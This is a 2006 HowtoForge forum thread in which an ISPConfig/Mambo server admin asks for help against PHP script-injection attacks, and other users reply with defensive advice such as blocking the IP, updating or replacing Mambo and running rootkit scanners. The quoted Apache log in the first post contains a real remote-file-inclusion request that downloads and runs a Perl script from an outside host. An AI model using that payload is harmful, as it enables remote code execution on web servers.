Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 16th July 2006, 01:15
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Default php script injections

server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server

extract from logfile /var/log/apache2/access_log

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

extract from logfile /var/log/apache2/error_log

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55-- http://66.90.88.178/mambo.txt
=> `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


Need help advice anything...

Thank you in advance
Reply With Quote
Sponsored Links
  #2  
Old 16th July 2006, 09:11
sjau sjau is offline
Local Meanie
 
Join Date: Apr 2006
Location: Switzerland
Posts: 1,126
Thanks: 4
Thanked 43 Times in 40 Posts
Default

you could deny the IP of the attacker in a .htaccess
Reply With Quote
  #3  
Old 16th July 2006, 09:48
TheRudy TheRudy is offline
Senior Member
 
Join Date: Dec 2005
Posts: 215
Thanks: 1
Thanked 7 Times in 5 Posts
Default

Remove the script asap. Contact author of script and tell them about this if you haven't wrote it yourself. You might also check for updates.. Denying IP won't solve it cause he can use different server and voila, you get hacked again..

I would lock down the server untill its checked out.. Run chrootkit and rkhunter (not sure if they detect this script but it can't hurt running them..).. An antivirus scan can't hurt either..

Btw, mambo is VERY buggy application. Would suggest you to switch to joomla if you want the same interface and stuff.. I think you can even upgrade from mambo to joomla..
Reply With Quote
  #4  
Old 16th July 2006, 09:53
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,033
Thanks: 260
Thanked 145 Times in 127 Posts
Default

http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)
Reply With Quote
  #5  
Old 16th July 2006, 10:13
TheRudy TheRudy is offline
Senior Member
 
Join Date: Dec 2005
Posts: 215
Thanks: 1
Thanked 7 Times in 5 Posts
Default

Quote:
Originally Posted by edge
http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)
You also checked that eh?
Reply With Quote
  #6  
Old 16th July 2006, 10:46
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Unhappy Cant find the scripts on my site

I cant seem to find the script on my server I've installed rkhunter and updated + scanned the system. found nothing

66.90.88.178 is not my site its just that my server is being told the get these scripts from various sites including the one mentioned and then running them when i check my running proccesses I find alot of https instances which dont make any sense to me I've tried looking for help on installing modsecurity on my suse 10 server, but had no luck. not to sure if its safe to install when running ispconfig with suse 10 using the perfect setup from howtoforge.

I have also updated o the latest patches from suse. these scripts are alos being run on domains that I have since made dormant with nothing in the actual /var/www/web#/web folder when i check my logs even they are being used to download these scripts which is strange since before ispconfig was installed I chmod 700 wget.
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
"unknown filter" growing apache log. wwparrish Installation/Configuration 6 1st September 2006 18:40
perfect setup suse 10 - phpmyadmin & mysql question reddog Server Operation 7 17th June 2006 12:59
2 domains, 1 site wadims Installation/Configuration 13 31st May 2006 00:21
Downgrade php5 to php4.4.2 llizards Installation/Configuration 4 13th March 2006 23:58
all my site go to /var/www/ Absolusteph Installation/Configuration 14 11th March 2006 21:27


All times are GMT +2. The time now is 19:30.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.